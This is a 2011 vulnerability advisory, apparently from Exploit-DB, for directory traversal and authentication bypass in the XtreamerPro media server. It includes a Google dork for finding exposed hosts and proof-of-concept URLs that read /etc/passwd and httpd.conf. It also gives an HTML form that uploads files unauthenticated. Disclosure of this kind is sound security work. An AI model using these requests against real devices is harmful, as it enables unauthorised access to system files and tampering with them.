XtreamerPRO Media-player and streamer multiple vulnerabilities

vendor:

XtreamerPro

by:

Itzik Chen

8.8

CVSS

HIGH

Directory Traversal and Authentication Bypass

22 (Path Traversal) and 287 (Improper Authentication)

CWE

Product Name: XtreamerPro

Affected Version From: 2.6.2000

Affected Version To: 2.7.2000

Patch Exists: YES

Related CWE: N/A

CPE: a:xtreamer:xtreamerpro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 Eng

2011

XtreamerPRO Media-player and streamer multiple vulnerabilities

XtreamerPro suffers from a directory traversal with appending the '/' character in the HTTP GET method of the affected host address. XtreamerPro also prone to an authentication bypass vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server without being authenticated. The attacker can also upload files to any location on the server, without being authenticated, using a multipart/form-data post.

Mitigation:

Ensure that the web server is configured to deny access to sensitive files and directories, and that authentication is properly enforced.

Source

Exploit-DB raw data:

# Exploit Title: XtreamerPRO Media-player and streamer multiple vulnerabilities
# Google Dork: intitle:Xtreamer Media Server + "2009 Xtreamer.net, All right reserved."
# Date: 15/05/2011
# Author: Itzik Chen
# Software Link: www.xtreamer.net
# Version: ver 2.6.0, 2.7.0
# Tested on: Windows XP SP3 Eng



Summary
================

XtreamerPro is a popular media-player and streamer with
an optional web interface management.



Description
================

XtreamerPro suffers from a directory traversal with 
appending the '/' character in the HTTP GET method of the
affected host address. XtreamerPro also prone to an 
authentication bypass vulnerability. This vulnerability 
can be exploited by remote attackers to access sensitive
data on the server without being authenticated. The attacker
can also upload files to any location on the server, without
being authenticated, using a multipart/form-data post.




Proof of Concept
================

directory traversal:

http://192.168.2.100/otherlist.php?dir=/%2f../%2f../etc/passwd
http://192.168.2.100/otherlist.php?dir=/%2f../%2f../etc/httpd.conf




Authentication bypass:

http://192.168.2.100/download.php?dir=/%2f../%2f../etc/&file=passwd
http://192.168.2.100/download.php?dir=/%2f../%2f../etc/&file=httpd.conf



Authentication bypass - upload file:

<form id="form1" name="write_form" action="http://192.168.2.100/upload_file.php?dir=/%2f../%2f../etc/" method="post" enctype="multipart/form-data"> 
	<INPUT TYPE=FILE name="Filedata" id="Filedata">
	<input type=submit>
</form> 



DEMO video:
http://www.youtube.com/watch?v=QZtiuYyA8XU